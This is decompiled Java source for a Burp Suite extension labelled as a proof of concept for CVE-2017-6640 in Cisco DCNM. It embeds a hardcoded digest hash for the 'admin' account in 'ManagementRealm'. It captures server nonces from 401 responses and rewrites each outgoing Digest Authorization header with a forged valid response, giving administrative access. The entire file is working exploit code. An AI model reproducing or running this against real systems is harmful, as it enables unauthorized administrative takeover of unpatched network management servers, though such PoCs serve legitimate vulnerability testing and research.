/*
 * Decompiled with CFR 0.152.
 */
package burp;

import burp.IBurpExtender;
import burp.IBurpExtenderCallbacks;
import burp.IExtensionHelpers;
import burp.IHttpListener;
import burp.IHttpRequestResponse;
import burp.IRequestInfo;
import burp.IResponseInfo;
import java.io.PrintWriter;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.List;

public class BurpExtender
implements IBurpExtender,
IHttpListener {
    private IExtensionHelpers helpers;
    private PrintWriter stdout;
    private PrintWriter stderr;
    private String lastNonce = null;
    private final String USERNAME = "admin";
    private final String REALM = "ManagementRealm";
    private final String H1_DIGEST = "92fb5411fb8f0d3c49611a96ed147093";

    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
        this.helpers = callbacks.getHelpers();
        callbacks.setExtensionName("CISCO_DCNM_CVE-2017-6640 - PoC");
        this.stdout = new PrintWriter(callbacks.getStdout(), true);
        this.stderr = new PrintWriter(callbacks.getStderr(), true);
        callbacks.registerHttpListener(this);
        this.stdout.println("CISCO_DCNM_CVE-2017-6640 - PoC loaded!");
    }

    private String md5hex(String input) {
        try {
            MessageDigest md = MessageDigest.getInstance("MD5");
            md.update(input.getBytes());
            byte[] digest = md.digest();
            StringBuilder sb = new StringBuilder(2 * digest.length);
            for (byte b : digest) {
                sb.append(String.format("%02x", b & 0xFF));
            }
            return sb.toString();
        }
        catch (NoSuchAlgorithmException e) {
            this.stderr.println(e.toString());
            return null;
        }
    }

    @Override
    public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse message) {
        if (messageIsRequest) {
            if (this.lastNonce != null) {
                IRequestInfo requestInfo = this.helpers.analyzeRequest(message.getRequest());
                String method = requestInfo.getMethod();
                String uri = "";
                List<String> headers = requestInfo.getHeaders();
                for (int i = 0; i < headers.size(); ++i) {
                    String headerString = headers.get(i);
                    if (!headerString.toLowerCase().startsWith("authorization: digest")) continue;
                    String[] args = headerString.split(",");
                    for (int j = 0; j < args.length; ++j) {
                        String argString = args[j].trim();
                        if (!argString.toLowerCase().startsWith("uri=")) continue;
                        uri = argString.replace("\"", "").substring(4);
                        break;
                    }
                    String h1 = "92fb5411fb8f0d3c49611a96ed147093";
                    String h2 = this.md5hex(method + ":" + uri);
                    String response = this.md5hex(h1 + ":" + this.lastNonce + ":" + h2);
                    String auth = "Authorization: Digest username=\"admin\", realm=\"ManagementRealm\", nonce=\"" + this.lastNonce + "\", uri=\"" + uri + "\", response=\"" + response + "\"";
                    this.stdout.println("* Request - Auth header captured:");
                    this.stdout.println("    Old header = " + headerString);
                    this.stdout.println("    New header = " + auth);
                    headers.set(i, auth);
                    byte[] newMessage = this.helpers.buildHttpMessage(headers, Arrays.copyOfRange(message.getRequest(), requestInfo.getBodyOffset(), message.getRequest().length));
                    message.setRequest(newMessage);
                    break;
                }
            }
        } else {
            IResponseInfo responseInfo = this.helpers.analyzeResponse(message.getResponse());
            if (responseInfo.getStatusCode() == 401) {
                List<String> headers = responseInfo.getHeaders();
                headers.forEach(header -> {
                    String headerString = header.toLowerCase();
                    if (headerString.startsWith("www-authenticate: digest")) {
                        String[] args = headerString.split(",");
                        for (int i = 0; i < args.length; ++i) {
                            String argString = args[i].trim();
                            if (!argString.startsWith("nonce=")) continue;
                            this.lastNonce = argString.replace("\"", "").substring(6);
                            this.stdout.println("* Response - Nonce captured:");
                            this.stdout.println("    Header = " + headerString);
                            this.stdout.println("    nonce  = " + this.lastNonce);
                        }
                    }
                });
            }
        }
    }
}

